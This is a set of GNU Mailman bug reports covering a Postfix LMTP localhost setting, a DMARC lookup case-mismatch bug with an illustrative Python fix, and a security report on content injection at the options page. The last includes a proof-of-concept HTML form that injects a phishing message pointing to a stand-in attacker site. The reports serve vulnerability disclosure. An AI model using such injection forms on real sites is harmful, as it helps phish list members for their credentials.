Public bug reported:
Setting localhost in postfix_lmtp works against Postfix defaults and
breaks delivery.
Reason: The Postfix lmtp client only uses DNS queries by default to
search for hostnames. If the DNS server does not provide an answer for
"localhost", delivery from the lmtp client to mailman fails.
Solution: Provide "127.0.0.1" instead of "localhost". This does not
require DNS and is even faster because it saves DNS lookups.
Example:
hey2@mailman.state-of-mind.de
lmtp:[localhost.localdomain]:8024
** Affects: mailman
Importance: Undecided
Status: New
** Tags: 3.0 mailman
--
setting localhost in postfix_lmtp breaks delivery
https://bugs.launchpad.net/bugs/544477
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
Public bug reported:
Using Mailman 2.1.33. I noticed that occasionally, DMARC mitigations for
aol.com "From" addresses were not being applied.
I tracked this down to the fact that DNS records can in rare cases return
"AOL" in uppercase in the answer of the TXT record lookup. Here's an
example where I caught it happening:
$ dig _dmarc.aol.com TXT
[...]
;; QUESTION SECTION:
;_dmarc.aol.com. IN TXT
;; ANSWER SECTION:
_dmarc.AOL.com. 492 IN TXT "v=DMARC1; p=reject; pct=100; rua=mailto:d@rua.agari.com; ruf=mailto:d@ruf.agari.com;"
Note that we requested "_dmarc.aol.com" in the question section, but got back "_dmarc.AOL.com" in the answer section. That case mismatch makes this code in Mailman/Utils.py skip the record:
    for name in want_names:
        if name not in results_by_name:
            continue
I believe the solution is to lowercase the result after the lookup.
Patch attached.
** Affects: mailman
Importance: Undecided
Status: New
** Tags: dmarc
** Patch added: "Lowercase DMARC TXT record label in answer section"
https://bugs.launchpad.net/bugs/1881035/+attachment/5377571/+files/mailman-…
--
https://bugs.launchpad.net/bugs/1881035
Title:
DMARC mitigation fails if TXT record name contains uppercase
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1881035/+subscriptions
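The case mismatch described in this report, as an added example that is not Mailman's own code: a small model of the DMARC lookup with a constructed answer section mirroring the quoted dig output, run once with byte-for-byte name comparison (the reported failure) and once with owner names lowercased (the proposed fix).

```python
from typing import Dict, List, NamedTuple, Optional

class TxtRecord(NamedTuple):
    name: str   # owner name as returned by the resolver, e.g. "_dmarc.AOL.com."
    text: str   # joined TXT strings

# Constructed answer section mirroring the dig output in the report:
# the resolver echoed the "AOL" label in uppercase.
ANSWER = [
    TxtRecord("_dmarc.AOL.com.",
              "v=DMARC1; p=reject; pct=100; "
              "rua=mailto:d@rua.agari.com; ruf=mailto:d@ruf.agari.com;"),
]

def dmarc_policy(domain: str, answer: List[TxtRecord],
                 normalize: bool = True) -> Optional[str]:
    """Return the DMARC 'p=' value for domain, or None if no record matched.

    normalize=False reproduces the bug: owner names are compared byte-for-byte.
    normalize=True applies the fix: DNS names are case-insensitive (RFC 4343),
    so the wanted name and every answer name are lowercased before matching.
    """
    def norm(n: str) -> str:
        return n.lower() if normalize else n

    want_names = {norm("_dmarc." + domain + ".")}
    results_by_name: Dict[str, List[str]] = {}
    for rec in answer:
        results_by_name.setdefault(norm(rec.name), []).append(rec.text)

    for name in want_names:
        if name not in results_by_name:
            continue          # the skip the bug report points at
        for txt in results_by_name[name]:
            tags = [t.strip() for t in txt.split(";") if t.strip()]
            if not tags or tags[0].lower() != "v=dmarc1":
                continue      # not a DMARC record
            for tag in tags[1:]:
                key, _, value = tag.partition("=")
                if key.strip().lower() == "p":
                    return value.strip().lower()
    return None
```

With normalize=False the uppercase answer name never matches the wanted name and no policy is found, which is exactly the mitigation being silently skipped; with normalize=True the same answer yields "reject".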
*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE-2018-13796 (https://www.cvedetails.com/cve/CVE-2018-13796/)
exists at a different endpoint and parameter. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. The message "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker@badsite.com"
will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
https://bugs.launchpad.net/bugs/1873722
Title:
Arbitrary Content Injection via the options login page.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions